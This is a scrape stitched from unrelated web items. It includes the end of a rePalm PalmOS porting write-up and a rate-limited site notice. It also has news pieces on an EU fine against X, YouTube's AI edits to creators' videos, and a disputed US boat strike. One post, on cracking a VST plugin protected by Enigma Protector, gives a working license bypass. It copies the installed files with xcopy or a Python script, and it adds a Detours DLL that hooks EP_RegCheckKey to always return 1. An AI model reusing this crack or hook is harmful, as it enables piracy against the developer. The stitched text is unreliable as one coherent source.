STM32F469DISCO board running PalmOS

This was a quick little hack to see in real life PalmOS running on a 3x density display. No such device ever shipped. The STM32F469DISCOVERY board has a 480x800 display, of which 480x720 is used as a 3x density display with a dynamic input area. This board has a capacitive touch screen, which makes it ill-suited for PalmOS. Capacitive touch screens are very bad for precise tapping of small elements, since your finger would normally obscure whatever it is that you are trying to tap. This screen being rather large helps a little, but not really all that much. I got this board working well enough to see what it is like, but put little work into it afterwards. Screen, touch, and SD card are the only things supported. It does not help that just like the STM32F429, STM32F469 lacks any cache, making it rather slow when running out of SDRAM.

RP2040

Raspberry Pi Pico running PalmOS

It is possible!

How little RAM/CPU does PalmOS 5 really require? Since rePalm had support (at least in theory) for Cortex-M0, I wanted to try on real hardware, as previously the support was tested on CortexEmu only. There does happen to be one Cortex-M0 chip out there with enough ram - the RP2040 - the chip in the $4 Raspberry Pi Pico . I then sought out a display with a touchscreen that could be easily bought. There were actually not that many options, but this one seemed like a good fit. It turned out, after some investigation, that driving it properly and quickly will not be at all easy. RP2040's special sauce - the PIO - to the rescue! I found a way to do it . I switched the resistors on the screen's board from "SPI" to "SDIO" to enable the SD card, and I wired up the LED to be the alarm LED for PalmOS. Those were the easy things.

As this project depends on some undocumented behaviour in the Cortex-M chips, it was always unknown what would happen in some cases. For example, Cortex-M3 causes a UsageFault when you jump to an address without the bottom bit set, indicating a switch to ARM mode. What would Cortex-M0 do? Turns out - it simply causes a HardFault . m0FaultDispatch to the rescue! It is able to categorize all the causes of a HardFault and wire them to the proper place. I did find one difference from the Cortex-M3. When the Cortex-M3 executes a BX PC instruction, it will execute a jump to the current address plus 4, in ARM mode. This differs from what ARMv5 chips do when you execute that same instruction in Thumb mode. They jump to the current address plus 4, rounded down to the nearest multiple of 4, in ARM mode. This difference my JIT and emulator code alrady handled. But Cortex-M0 does yet a third thing in this case. It actually seems to treat the actual instruction as invaild. PC is not changed, mode is not changed, and a HardFault is taken right on the instruction itself. Curiously, this does not happen if another non-PC register with the low bit clear is used. Well, in any case, I adjusted the JIT and the emulator code to handle this. I also modified CortexEmu to emulate this properly.

Memories

RP2040 lacks any flash, it uses an external Q/D/SPI flash for code and data storage. This is convenient when you have a lot of data. For rePalm this means we can have a ROM as big as the biggest flash chip we can buy. The Pi Pico comes with a 2MB chip, so I targetted that. The RAM situation is much tighter. There is just 264KB of RAM in there. This is not much. The last PalmOS device to have this little RAM ran PalmOS 1.0. But it is worth trying. One of the largest RAM expenditures are graphics. The primary one is the framebuffer. PalmOS assumes that the display has a framebuffer that is directly accessible by the CPU. This means that if I wanted to use the entire 320x240 display in truecolor mode, the framebuffer would occupy 150Kb. Oof! Well, how much IS acceptable?

Some experimentation followed. To boot successfully and to launch the launcher, preferences app, and the digitizer calibration panel successfully, approximately 128KB of dynamic RAM is necessary. The various default databases as well as PACE temporary databases in the storage heap mandate a storage heap of at least 50KB. A 64KB minimum storage heap size is preferred, really, so we do not immediately run out of space at boot. And rePalm's DAL needs at least 15KB of memory for its data structures and about 24KB for the kernel heap where stacks and various other data structures are allocated. Let's add those up. The sum is 231KB. that leaves at most 33KB for the framebuffer. There are a few options. We can use the whole screen at 2 bits per pixel (4 greys). This will need a 18.75KB framebuffer. We can use a square 240x240 screen at 4 bits per pixel, for a 28.125KB framebuffer. We can also use the standard low-density resolution of 160x160 at a whopping 8 bits per pixel (the only non-greyscale option).

One might notice that the above memory areas did not include a JIT translation cache. This is correct. While my JIT does indeed support targetting the Cortex-M0, there simply is not enough space to make it worthwhile. I instead enabled the asmM0 ARM emulator core since it needs no extra space of any sort. Not wonderful, but oh well. We knew all along that compromises would need to be made! As long as I'm just showing off, let's have a full-screen experience, with a dynamic input area and all! 320x240 it is! The second core of the RP2040 is not currently used (yet).

PACE again

My previously-mentioned Cortex-M3-targetting patched PACE is of no use on a Cortex-M0. Combine this with the fact that I cannot use the JIT means that all the 68K code will be running under double emulation (68K emulated by ARM, ARM itself emulated in thumb). It was time to write a whole new 68k emulator, in Thumb-1 assembly, of course. I give you PACE.m0 . It is actually rather fast, competing well with Palm's ARM PACE in performance, as tested on my Tungsten T3. It really helped make the RP2040 build usable. It is now no slower than a Tunsten T was.

So where does this leave us?

There is still a lot to do: implement BT, WiFi, USB, debug NVFS some more, and probably many more things. However, I am releasing some little preview images to try, if you happen to have an STM32F429 discovery board, an AximX3, a raspberryPi Pico with the proper screen. No support for USB. Anyways if you want to play with it, here: LINK . I am also continuing to work on the reSpring/MSIO/and ther hardware options and you might even be able to get your hands on one soon :) If you already have a reSpring module (you know who you are), the archive linked to above has an update to 1.3.0.0 for you too.

Source Code

Source intro

Version 0000 source download is here. This is a very very very early release of the source code, just to allow people to browse this codebase and see what it is. The README explains the basic directory structure, and there is a LICENSE document in each directory. Building this requires a modern (read: mine) build of PilRC (included) and an ARM cross-gcc toolchain. Some builds require a PalmOS-specific 68k toolchain too, from here , for example.

Building basics

Building a working image is a multi-step process. First the DAL needs to be built. This is accomplished by running make in the myrom/dal directory. Some params need to be passed to it. For example, to build for rPI-Pico with the waveshare display, the command make BUILD=RP2040_Waveshare will do. For some cases, makefile itself will need to be edited. For the abovementioned build, for example, we do not want to use jit, preferring the emulator instead. To do this, you'll want to comment out the line ENABLE_JIT = yes and uncomment the one that says EMU_CORE = asmM0 . This will build the DAL.prc. The next step is to build a full ROM image. This is done from the myrom directory. Again, make is used. The parameters now are the build type (which determines the ROM image parameters) and the directory of files to include in the ROM. For the RP2040_Waveshare build, the proper incantation is make RP2040_Waveshare FILESDIR=files_RP2040_Waveshare . The files directory given already contains some other things from rePalm, like PACE and rePalm information preferences panel.

Building PACE

The PACE patch is a binary patch unto PACE. It is built in a few steps. First the patch itself is assembled using make in the myrom/paceM0 directory. This will produce the patch as a ".bin" file. Then using the patchpace tool (which you must also build) you can apply this patch to an unmodified PACE.prc file (a copy of which can be found, for exmaple, in the AximX3 directory). This patched pace can now replace the stock one in the destination files directory.

Article update history

  1. image above was updated to v00001: jit is now on (much faster), RTC works (time), notepad added, touch response improved
  2. image above was updated to v00002: grafitti area now drawn, grafitti works, more apps added (Bejeweled removed for space reasons)
  3. image above was updated to v00003: ROM is now compressed to allow more things to be in it. This is ok since we unpack it to RAM anyways. some work done on SD card support
  4. Explained how LDM/STM are translated
  5. Wrote a bit about SD card support
  6. Wrote a bit about serial port support
  7. Wrote a bit about Vibrate & LED support
  8. Wrote the first part about NetIF drivers
  9. image above was updated to v00004: some drawing issues fixed (underline under memopad text field), alert LED now works, SD card works (if you wire it up to the board)
  10. image above was updated to v00005: some support for 1.5 density displays works so image now uses the full screen
  11. Wrote the document section on 1.5-density display support
  12. Wrote the document section on DIA support and uploaded v000006 image with it
  13. Wrote a section on PACE , uploaded image v000007 with much faster 68k execution and some DIA fixes
  14. Uploaded image v000008 with IrDA support
  15. Wrote about audio support
  16. Wrote about reSpring
  17. Uploaded image v000009 with preliminary audio support
  18. Uploaded image v000010 with new JIT backend and multiple JIT fixes
  19. Uploaded image v000011 with an improved JIT backend and more JIT fixes, and an SD-card based updater. Wrote about the Cortex-M0 backend
  20. Wrote a lot about reSpring hardware v1 bring up and current status
  21. Uploaded STM32F429 discovery image v000012 with significant speedups and some fixes (grafiti, notepad)! (this corresponds to rePalm v 1.1.1.8)
  22. Uploaded STM32F429 and, for the first time ever , reSpring images for v 1.3.0.0 with many speedups, wrote about mic support and Zodiac support
  23. Apr 15, 2023: PACE for M0, rePalm hardware update: MSIO, AximX3, RP2040, new downloads
  24. Sep 3, 2023: Source dode posted for the first time

Have I been Flocked? – Check if your license plate is being watched

Hacker News
haveibeenflocked.com
2025-12-06 03:16:35
Comments...
Original Article

This website has been temporarily rate limited

You cannot access this site because the owner has reached their plan limits. Check back later once traffic has gone down.

If you are owner of this website, prevent this from happening again by upgrading your plan on the Cloudflare Workers dashboard .

Learn more about this issue →

Cloudflare Ray ID: 9a995e8a3af31dcc 2025-12-06 05:26:35 UTC Your IP: 204.19.241.141 Runs on Cloudflare Workers

I cracked a $200 software protection with xcopy

Hacker News
www.ud2.rip
2025-12-06 02:37:58
Comments...
Original Article

disclaimer: this is educational security research only. i do not condone piracy. i purchased a legitimate license for this software and conducted this analysis on my own property. this writeup exists to document protection implementation flaws, not to enable theft. support developers - buy their software.

github repo: vmfunc/enigma

tl;dr

i spent a day analyzing enigma protector - a $200 commercial software protection system used by thousands of vendors. RSA cryptographic signatures, hardware-bound licensing, anti-debugging, VM-based code obfuscation. serious enterprise security theater.

then i noticed the protected installer extracts a completely unprotected payload to disk.

xcopy /E "C:\Program Files\...\product" .\crack\

that’s the entire crack. copy the installed files. they run on any machine. no keygen needed, no binary patching, no cryptanalysis.

$200 protection defeated by a command that shipped with DOS 3.2 in 1986.

this is a case study in why threat modeling matters more than fancy cryptography, and why “military-grade encryption” means nothing when you leave the back door wide open.


target overview

Bass Bully Premium VST3 - Landing Page Screenshot

bass bully premium - a VST3 synthesizer plugin. protected by enigma protector , a commercial software protection system that costs $250+ and promises serious security.

from their marketing:

“Enigma Protector is a powerful tool designed to protect executable files from illegal copying, hacking, modification and analysis.”

we’ll see about that.

we have one known valid license:

Key:  GLUJ-XXXX-XXXX-XXXX-XXXX-XXXX-XXXX-V99KP3
HWID: 3148CC-XXXXXX
Name: Bass Bully

our goal: understand the protection and build a proper crack


static analysis

first, let’s look at what we’re dealing with:

import pefile

pe = pefile.PE(r"Bass Bully Premium_Installer_win64.exe")

print(f"Machine:     {'x64' if pe.FILE_HEADER.Machine == 0x8664 else 'x86'}")
print(f"Sections:    {pe.FILE_HEADER.NumberOfSections}")
print(f"Entry Point: 0x{pe.OPTIONAL_HEADER.AddressOfEntryPoint:X}")
print(f"Image Base:  0x{pe.OPTIONAL_HEADER.ImageBase:X}")
Machine:     x64
Sections:    9
Entry Point: 0x16485D0
Image Base:  0x140000000

that entry point is suspicious. 0x16485D0 is way into the binary.. typical of packed executables where the real entry point is hidden. normal programs start around 0x1000 .

string hunting

with open(pe_path, 'rb') as f:
    data = f.read()

for target in [b'Enigma Protector', b'enigmaprotector']:
    offset = 0
    while (idx := data.find(target, offset)) != -1:
        print(f"0x{idx:08X}: {target.decode()}")
        offset = idx + 1
0x0040972B: Enigma Protector
0x00409746: Enigma Protector
0x00409786: Enigma Protector
0x00409BA8: Enigma Protector
0x00409BC3: Enigma Protector
0x0040A038: Enigma Protector
0x0040A053: Enigma Protector
0x004099BF: enigmaprotector
0x00409DDA: enigmaprotector

confirmed: enigma protector. now we know what we’re dealing with.

what about the network?

does this even phone home..?

imports = [entry.dll.decode() for entry in pe.DIRECTORY_ENTRY_IMPORT]
kernel32.dll, user32.dll, advapi32.dll, oleaut32.dll, gdi32.dll,
shell32.dll, version.dll, ole32.dll, COMDLG32.dll, MSVCP140.dll, ...

no winhttp.dll , wininet.dll , or ws2_32.dll . offline validation only. all crypto is local, so theoretically extractable.

this is good news!! online validation would require MITM or server emulation. offline means everything we need is in the binary.


the enigma protector internals

enigma protector is a commercial protection system that provides:

  1. code virtualization - transforms x86/x64 into proprietary VM bytecode
  2. anti-debugging - IsDebuggerPresent , timing checks, hardware BP detection
  3. anti-tampering - CRC checks on packed sections
  4. registration API - HWID-bound licensing with RSA signatures

you can read about all these features on their documentation page . they’re pretty thorough about explaining what they protect against. they just didn’t think someone would… not use it on the payload.

The Enigma Protection and motivation for buying - diagram showing protection levels

the registration API

according to enigma’s SDK, these functions are exposed:

int EP_RegCheckKey(const char* name, const char* key);
const char* EP_RegHardwareID(void);
void EP_RegSaveKey(const char* name, const char* key);
void EP_RegLoadKey(char* name, char* key);

these aren’t normal exports ; they’re resolved dynamically after enigma unpacks itself. you can’t just GetProcAddress them from outside. you have to either:

  • hook them at runtime after unpacking
  • pattern scan the unpacked memory
  • be an absolute clown and just not use them in your payload (definitely not foreshadowing)

the entry point

using capstone to disassemble the entry point:

from capstone import Cs, CS_ARCH_X86, CS_MODE_64

entry_rva = pe.OPTIONAL_HEADER.AddressOfEntryPoint
entry_offset = pe.get_offset_from_rva(entry_rva)

with open(pe_path, 'rb') as f:
    f.seek(entry_offset)
    code = f.read(64)

md = Cs(CS_ARCH_X86, CS_MODE_64)
base = pe.OPTIONAL_HEADER.ImageBase + entry_rva

for insn in md.disasm(code, base):
    print(f"0x{insn.address:X}: {insn.mnemonic:8} {insn.op_str}")
0x1416485D0: jmp      0x1416485da      ; skip garbage bytes
0x1416485D2: add      byte ptr [rsi + 0x40], dl
0x1416485D8: add      byte ptr [rax], al
0x1416485DA: push     rax              ; real code starts here
0x1416485DB: push     rcx
0x1416485DC: push     rdx
0x1416485DD: push     rbx
0x1416485DE: push     rbp
0x1416485DF: push     rsi
0x1416485E0: push     rdi
0x1416485E1: push     r8
0x1416485E3: push     r9

the jmp-over-garbage pattern is classic anti-disassembly. linear disassemblers will try to decode the garbage bytes between jmp and its target, producing nonsense. the real unpacker starts at 0x1416485DA with a standard register preservation sequence before calling the enigma loader.


phase 3: key format analysis

we have a known valid key. let’s understand its structure before we try to break it.

GLUJ-XXXX-XXXX-XXXX-XXXX-XXXX-XXXX-V99KP3

structure breakdown

  • 8 groups separated by dashes
  • groups 0-6: 4 characters each
  • group 7: 6 characters (larger - likely checksum/signature)
  • character set: 0-9, A-Z (base36)

base36 decoding

key = "GLUJ-QE58-U3Z4-RQTJ-K7GJ-JXZ5-CVK5-V99KP3"
groups = key.split('-')

for i, group in enumerate(groups):
    val = int(group, 36)
    bits = val.bit_length()
    print(f"[{i}] {group:6} = {val:10} (0x{val:08X}) {bits:2} bits")
[0] GLUJ   =     774811 (0x000BD29B) 20 bits
[1] QE58   =    1231388 (0x0012CA1C) 21 bits
[2] U3Z4   =    1404832 (0x00156FA0) 21 bits
[3] RQTJ   =    1294471 (0x0013C087) 21 bits
[4] K7GJ   =     942787 (0x000E62C3) 20 bits
[5] JXZ5   =     930497 (0x000E32C1) 20 bits
[6] CVK5   =     600773 (0x00092AC5) 20 bits
[7] V99KP3 = 1890014727 (0x70A75607) 31 bits  <- significantly larger

interesting. group 7 is way bigger than the others. that’s probably a truncated cryptographic signature.

cryptographic structure

the key structure appears to be:

[    DATA: ~143 bits     ] [ SIGNATURE: 31 bits ]
 Groups 0-6 (7 x ~20 bits)   Group 7 (truncated)

enigma uses RSA for signing. the full signature would be much larger, but they truncate it to fit the key format. this means:

  1. public key is embedded in the protected binary
  2. key validation = RSA signature verification
  3. keygen would require extracting and factoring the RSA modulus

RSA with small key sizes is technically factorable with enough compute. but that’s a lot of work for… well, you’ll see.

HWID format

hwid = "3148CC-059521"
parts = hwid.split('-')
# Two 24-bit values = 48 bits total hardware fingerprint

HWID is derived from hardware characteristics (CPU ID, disk serial, MAC address, etc). the key is cryptographically bound to this value, so a key generated for one machine won’t work on another.

this is actually decent protection! if they used it properly! (they didn’t lmao)


the pivot

at this point i’m preparing to either factor the RSA key or do runtime hooking to bypass validation. then i thought: wait, what are we actually protecting here?

let me just check the installed VST real quick…

analyzing the installed VST

vst_path = r"C:\Program Files\Common Files\VST3\Bass Bully VST\Bass Bully Premium.vst3"
vst_dll = vst_path + r"\Contents\x86_64-win\Bass Bully Premium.vst3"
pe_vst = pefile.PE(vst_dll)

print(f"Size: {os.path.getsize(vst_dll):,} bytes")
print("Imports:")
for entry in pe_vst.DIRECTORY_ENTRY_IMPORT:
    print(f"  {entry.dll.decode()}")
Size: 7,092,736 bytes
Imports:
  KERNEL32.dll
  USER32.dll
  GDI32.dll
  SHELL32.dll
  ole32.dll
  OLEAUT32.dll
  MSVCP140.dll
  WINMM.dll
  IMM32.dll
  dxgi.dll
  VCRUNTIME140.dll
  VCRUNTIME140_1.dll
  api-ms-win-crt-runtime-l1-1-0.dll
  ...

wait. where are the enigma imports?

hunting for protection

with open(vst_dll, 'rb') as f:
    data = f.read()

for term in [b'Enigma', b'EP_Reg', b'Registration', b'HWID', b'enigma']:
    count = data.count(term)
    print(f"{term.decode():15} : {count} occurrences")
Enigma          : 0 occurrences
EP_Reg          : 0 occurrences
Registration    : 0 occurrences
HWID            : 0 occurrences
enigma          : 0 occurrences

zero.

hold on.

$ strings "Bass Bully Premium.vst3" | grep -i enigma
$ strings "Bass Bully Premium.vst3" | grep -i regist

nothing. no output… ?????????

you have got to be kidding me.

the VST has absolutely no protection. it’s a clean JUCE framework build. no enigma runtime. no license callbacks. no protection whatsoever.

they protected the installer. not the payload. THE INSTALLER. NOT THE ACTUAL PRODUCT.

i can’t even be mad. this is genuinely hilarious.


the vulnerability

here’s what’s happening:

+-------------------------------------------------------------------+
|                    ENIGMA PROTECTOR                               |
|  +--------------------------------------------------------------+ |
|  |  Installer.exe                                               | |
|  |  [x] RSA key verification                                    | |
|  |  [x] HWID binding                                            | |
|  |  [x] Anti-debug, anti-tamper                                 | |
|  |  [x] Code virtualization                                     | |
|  |                        |                                     | |
|  |                        v                                     | |
|  |  +--------------------------------------------------------+  | |
|  |  |  Payload (extracted on install)                        |  | |
|  |  |  - Bass Bully Premium.vst3  <- ZERO PROTECTION lol     |  | |
|  |  |  - Bass Bully Premium.rom   <- NOT EVEN ENCRYPTED      |  | |
|  |  +--------------------------------------------------------+  | |
|  +--------------------------------------------------------------+ |
+-------------------------------------------------------------------+

the entire protection stack only controls whether the installer runs. once files hit disk, the protection is basically useless.

this is like putting a vault door on a tent.

what they should have done

enigma would have been effective if the VST itself checked the license:

bool VST_Init() {
    char key[256], name[256];
    EP_RegLoadKey(name, key);

    if (!EP_RegCheckKey(name, key)) {
        ShowTrialNag();
        return false;
    }

    CreateThread(NULL, 0, LicenseWatchdog, NULL, 0, NULL);
    return true;
}

instead, the VST has no EP_Reg* calls. no license checks. no callbacks. nothing. it just… runs.


the crack

the crack is embarrassingly simple. i spent hours analyzing RSA key formats for this…

the very sophisticated exploit

xcopy /E "C:\Program Files\Common Files\VST3\Bass Bully VST" .\crack\
copy "C:\ProgramData\Bass Bully VST\Bass Bully Premium\*.rom" .\crack\

that’s it. that’s the crack. copy the files. they work on any machine because there’s no license check in the actual product.

i wrote a python script to automate it because i have some self-respect:

#!/usr/bin/env python3
import shutil
from pathlib import Path

VST_SRC = Path(r"C:\Program Files\Common Files\VST3\Bass Bully VST\Bass Bully Premium.vst3")
ROM_SRC = Path(r"C:\ProgramData\Bass Bully VST\Bass Bully Premium\Bass Bully Premium.rom")

def extract():
    out = Path("crack_package")
    out.mkdir(exist_ok=True)
    shutil.copytree(VST_SRC, out / "Bass Bully Premium.vst3", dirs_exist_ok=True)
    shutil.copy2(ROM_SRC, out / "Bass Bully Premium.rom")
    print("[+] done")

if __name__ == "__main__":
    extract()

usage:

python patcher.py

load in fl studio. no registration. no nag. no nothing. because there’s no check.


for science: the hook approach

we also wrote a DLL that hooks enigma’s validation at runtime. completely unnecessary given the vulnerability, but i’d already done the research so here it is:

#include <windows.h>
#include <detours.h>

static int (WINAPI *Real_EP_RegCheckKey)(LPCSTR, LPCSTR) = NULL;

int WINAPI Hooked_EP_RegCheckKey(LPCSTR name, LPCSTR key) {
    return 1;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID lpReserved) {
    if (reason == DLL_PROCESS_ATTACH) {
        Sleep(2000);
        DetourTransactionBegin();
        DetourUpdateThread(GetCurrentThread());
        DetourAttach(&(PVOID&)Real_EP_RegCheckKey, Hooked_EP_RegCheckKey);
        DetourTransactionCommit();
    }
    return TRUE;
}

this approach works great. completely unnecessary. the payload has no protection.

Screenshot showing hook approach Screenshot showing hook approach result


lessons learned

for developers

  1. protect the payload, not the installer - if users need the installed files to run your software, those files need runtime protection

  2. defense in depth - don’t rely on a single layer. the VST should call EP_RegCheckKey on load

  3. threat model correctly - ask “what happens after installation?” if the answer is “nothing checks the license”, you have a problem

  4. periodic validation - one-time checks are trivially bypassed by file copying

for reversers

  1. always check the payload first - before diving into complex crypto, verify what you’re actually protecting

  2. the simplest attack wins - don’t factor RSA when xcopy works

  3. protection != security - expensive protection systems are worthless if applied incorrectly

  4. sometimes the crack writes itself - not every target requires sophisticated techniques


conclusion

enigma protector’s $250 protection was defeated by:

xcopy /E "C:\Program Files\..." .\crack\

the protection itself works fine - RSA signatures, HWID binding, anti-debug. but it only protects the installer. the payload runs completely unprotected.

250 dollars for a this…

EU hits X with €120M fine for breaching the Digital Services Act

Hacker News
www.dw.com
2025-12-06 02:32:01
Comments...
Original Article

The European Union has fined Elon Musk's social media platform X €120 million ($140 million) for breaching its transparency rules set out in its Digital Services Act (DSA) .

"Deceiving users with blue checkmarks, obscuring information on ads and shutting out researchers have no place online in the EU," said European Commission Vice President Henna Virkkunen.

Pre-empting the announcement on Thursday night, United States Vice President JD Vance that "the EU should be supporting free speech not attacking American companies over garbage."

Virkkunen said the ruling had "nothing to do with censorship," adding: "If you comply with our rules, you don't get a fine. It's as simple as that."

Why has the EU fined X?

The heavy fine is the first such punishment issued by the European Commission, which began its investigations into X in December 2023.

Among other things, Brussels accuses the platform of using the white and blue checkmarks for paid user accounts to falsely suggest that these accounts are authentic and verified.

The Commission also criticized that it is not always clear who is behind advertising on X.

DSA fines can be as high as 6% of a company's annual global revenue, but the Commission said X's annual turnover didn't play a direct role in the calculation of the fine.

According to the EU decision, the penalty consists of three parts: €45 million for the verification checkmarks, €35 ​​million for the lack of advertising transparency, and €40 million for the lack of data access for researchers.

"We are not here to impose the highest fines," insisted Virkkunen. "We are here to make sure that our digital legislation is enforced."

Additional "very broad" investigations into Musk's platform are ongoing, according to the EU, including into whether X has taken sufficient action to combat the spread of illegal content and manipulated information.

How has the US government reacted to the EU fining X?

But the US government has criticized the bloc for "regulatory suffocation" and threatened trade consequences, with US Commerce Secretary Howard Lutnick last week pressing the EU to rethink its rules if it wants lower steel duties.

Brendan Carr, the chairman of the Federal Communications Commission (FCC), the US agency which regulates national and international radio, television, wire, satellite, and cable communications, condemned the EU.

In a post on X, Carr accused the bloc of "fining a successful US tech company for being a successful US tech company."

"Europe is taxing Americans to subsidize a continent held back by Europe’s own suffocating regulations," Carr said.

Edited by: Roshni Majumdar

YouTube caught making AI-edits to videos and adding misleading AI summaries

Hacker News
social.growyourown.services
2025-12-06 01:15:48
Comments...

YouTube caught making AI-edits to videos and adding misleading AI summaries

Hacker News
www.ynetnews.com
2025-12-06 01:15:48
Comments...
Original Article

Popular YouTubers Rick Beato and Rhett Shull discovered the platform was quietly altering their videos with AI; the company admits to a limited experiment, raising concerns about trust, consent and media manipulation

YouTube has begun quietly using artificial intelligence to enhance videos by some of its top creators—without notifying them or their audiences.

The practice was first noticed by two well-known American YouTubers popular among music enthusiasts: Rick Beato and Rhett Shull. Both run channels with millions of subscribers. Beato, a music educator and producer with more than 5 million subscribers, said he realized something was “off” in one of his recent videos.

“I thought I was imagining it, but my hair looked strange, and it almost looked like I was wearing makeup,” he said in a post.

It turns out YouTube has been experimenting in recent months with AI-powered video enhancement , even altering YouTube Shorts without creator approval. The changes are subtle: sharper shirt folds, smoother or more highlighted skin, even slightly altered ears. Most viewers would not notice—but Beato and Shull said the edits made their videos feel unnatural.

Shull, a guitarist and creator, posted a video about the issue. “It looks like something AI-generated,” he said. “It bothers me because it could erode the trust I have with my audience.”

1 View gallery

יוטיוב שורטס

יוטיוב שורטס

( Photo: Shutterstock )

Complaints about odd changes to Shorts surfaced on social media as early as June, but only after Beato and Shull spoke out did YouTube confirm the experiment.

Rene Ritchie, YouTube’s creator liaison, acknowledged in a post on X that the company was running “a small experiment on select Shorts, using traditional machine learning to clarify, reduce noise and improve overall video clarity—similar to what modern smartphones do when shooting video.”

That explanation drew further criticism. Samuel Woolley, a disinformation expert at the University of Pittsburgh, said the company’s wording was misleading. “Machine learning is a subset of artificial intelligence,” he said. “This is AI.”

The controversy highlights a wider trend in which more of what people see online is pre-processed by AI before reaching them. Smartphone makers like Samsung and Google have long used AI to “enhance” images. Samsung previously admitted to using AI to sharpen moon photos, while Google’s Pixel “Best Take” feature stitches together facial expressions from multiple shots to create a single “perfect” group picture.

“What’s happening here is that a company is altering creators’ content and distributing it to the public without their consent,” Woolley said. Unlike Photoshop filters or social media effects, he warned, YouTube’s AI edits add another hidden layer between audiences and the media they consume—raising concerns about authenticity.

While Woolley warned of eroding public trust, Beato remained more optimistic. “YouTube is always working on new tools and experimenting,” he said. “They’re an industry leader, and I have nothing bad to say about them. YouTube changed my life.”

Still, critics say even minor retouching without disclosure sets a troubling precedent. YouTube is home not only to entertainment, but also to news, education, and informational content—areas where accuracy and authenticity matter.

The quiet rollout suggests a future in which AI may increasingly reshape digital media before users even press play.

Video Collapses Hegseth’s Defense of Boat Bombing

Portside
portside.org
2025-12-06 01:06:03
Video Collapses Hegseth’s Defense of Boat Bombing barry Fri, 12/05/2025 - 20:06 ...
Original Article

Defense Secretary Pete Hegseth defended a deadly follow-up strike on a suspected drug boat in the Caribbean, citing the “fog of war.” | screen grab

Members of Congress were just permitted to view the video of the second boat-bombing strike that’s consuming Washington in controversy , during a classified briefing with Admiral Frank Bradley, who oversaw the operation. What they saw was deeply unnerving. And it pushes Defense Secretary Pete Hegseth’s story closer to collapse .

Representative Adam Smith, ranking Democrat on the Armed Services Committee, said in an interview that the video of the second strike—which killed two men who’d been clinging to the wreckage of a boat destroyed in an earlier strike—badly undermines Hegseth’s stance in this scandal.

“This did not reduce my concerns at all—or anyone else’s,” Smith told me. “This is a big, big problem, and we need a full investigation.”

Smith said the video shows two men, sitting without shirts, atop a portion of a capsized boat that was still above water. That portion, Smith said, could barely have fit four people.

“It looks like two classically shipwrecked people,” Smith told me. But in the briefing, lawmakers were told that “it was judged that these two people were capable of returning to the fight,” Smith added. He called it a “highly questionable decision that these two people on that obviously incapacitated vessel were still in any kind of fight.”

Lawmakers pressed Bradley for a “considerable period of time” on the obviously incapacitated nature of the two men, Smith says. And the response was deeply unnerving. “The broader assumption that they were operating off of was that the drugs could still conceivably be on that boat, even though you could not see them,” Smith said, “and it was still conceivable that these two people were going to continue on their mission of transmitting those drugs.”

To be clear on what this means: The underlying claim by Trump and the administration is that all of the more than 80 people killed on these boats are waging war against the United States. They are “narco-terrorists,” in this designation. But this very idea—that these people are engaged in armed conflict with our country—is itself broadly dismissed by most legal experts. They should be subject to police action, these experts say, but not summary military execution, and Trump has effectively granted himself the power to execute civilians in international waters.

Yet here it gets even worse. The laws of war generally prohibit the killing of people who are no longer “in the fight” in any meaningful sense, specifically including the shipwrecked. But these lawmakers were told in the closed-door briefing that the two men were still deemed to be “in the fight” by virtue of the fact that there could have been still-transmittable drugs in the capsized and wrecked boat, Smith says. And that those two men sitting atop the wreckage could have continued with their delivery of them.

“The evidence that I’ve seen absolutely demands a further and continued investigation,” Smith told me. “It strains credibility to say that they were still in the fight.”

This badly undermines the story Hegseth has told. He has said that he did not see the two men before the second strike was ordered, suggesting both that he’d gone off to do other things and that the “fog of war” had prevented a clear viewing of the two men.

Obviously what these lawmakers saw contradicts the latter suggestion: The two men were, in Smith’s telling, very visible, so the “fog of war” line appears to be nonsense. And Hegseth’s implication that the strike was justified due to confusion about the men’s status also appears to be in profound doubt.

Republicans who have seen the video have insisted this was all lawful. Senator Tom Cotton, for instance, said it showed the two survivors attempting to flip a boat “loaded with drugs bound for the United States.” But if Smith’s account of the video is correct, that’s in doubt: The boat looked incapacitated, and the drugs weren’t in fact visible.

The military officials stressed in the briefing that Hegseth never directly ordered them to “kill them all,” meaning all the people on board, something that was implied by Washington Post reporting and that Hegseth denied to Trump. And they confirmed that Hegseth didn’t give the direct order for the second strike, Smith says.

But they did say that Hegseth’s declared mission was to kill all 11 people, Smith notes. “It was, ‘Destroy the drugs, kill all 11 people on board,’” Smith told me. “It is not that inaccurate to say that the rules of engagement from Hegseth were, ‘Kill all 11 people on that boat.’” And so, by all indications, that second strike appears to have been ordered to comply with Hegseth’s command.

Smith did confirm that he’s “somewhat satisfied” by the intelligence he saw that the boat originally did have drugs on it. But again, the idea that any of these people, even if they were trafficking drugs, are “in the fight”—in the sense of waging war against the United States—is already indefensible to begin with.

“They have an unbelievably broad definition of what ‘the fight’ is,” Smith said, and in that context, the order to kill all 11 people on the boat, no matter what, looks even worse: “It’s bad.”

Another Democrat, Representative Jim Himes, seconds this interpretation. “You have two individuals in clear distress without any means of locomotion with a destroyed vessel, who were killed by the United States,” he said .

Importantly, Smith told me that he and others urged military officials to release the video. “I think that video should be public,” Smith said, adding that he also wants to see the much-discussed legal memo supposedly authorizing the strikes released as well. But the military officials said public release isn’t their call. So now the pressure should intensify on Trump and Hegseth to authorize release of both.

There’s also been some discussion of radio communications that the two men may have sent for help. The idea is supposed to be that if they could get assistance, they could get back “in the fight,” meaning they were legit targets. But Smith said the officials confirmed to lawmakers they have no recording of these communications. So this piece of support for the Hegseth-Trump stance may not really exist.

Brian Finucane, a former State Department lawyer, says the entire operation is illegal but that a full investigation could establish more clearly whether this particular strike deliberately targeted the men or just targeted the boat. From what we’re now learning from Smith and others, it clearly seems like the former.

“Based on the descriptions of lawmakers, it does sound as if the men were shipwrecked, and targeting them would be a war crime,” Finucane told me. “It sounds like the men were the target.” He said the stories being told by Hegseth and others are now falling apart: “None of these narratives withstand scrutiny.”

The Daily Blast . A seasoned political commentator with over two decades of experience, he was a prominent columnist and blogger at The Washington Post from 2010 to 2023 and has worked at Talking Points Memo, New York magazine, and the New York Observer. Greg is also the author of the critically acclaimed book An Uncivil War: Taking Back Our Democracy in an Age of Disinformation and Thunderdome Politics.

The New Republic was founded in 1914 to bring liberalism into the modern era. The founders understood that the challenges facing a nation transformed by the Industrial Revolution and mass immigration required bold new thinking.

Today’s New Republic is wrestling with the same fundamental questions: how to build a more inclusive and democratic civil society, and how to fight for a fairer political economy in an age of rampaging inequality. We also face challenges that belong entirely to this age, from the climate crisis to Republicans hell-bent on subverting democratic governance.

We’re determined to continue building on our founding mission.

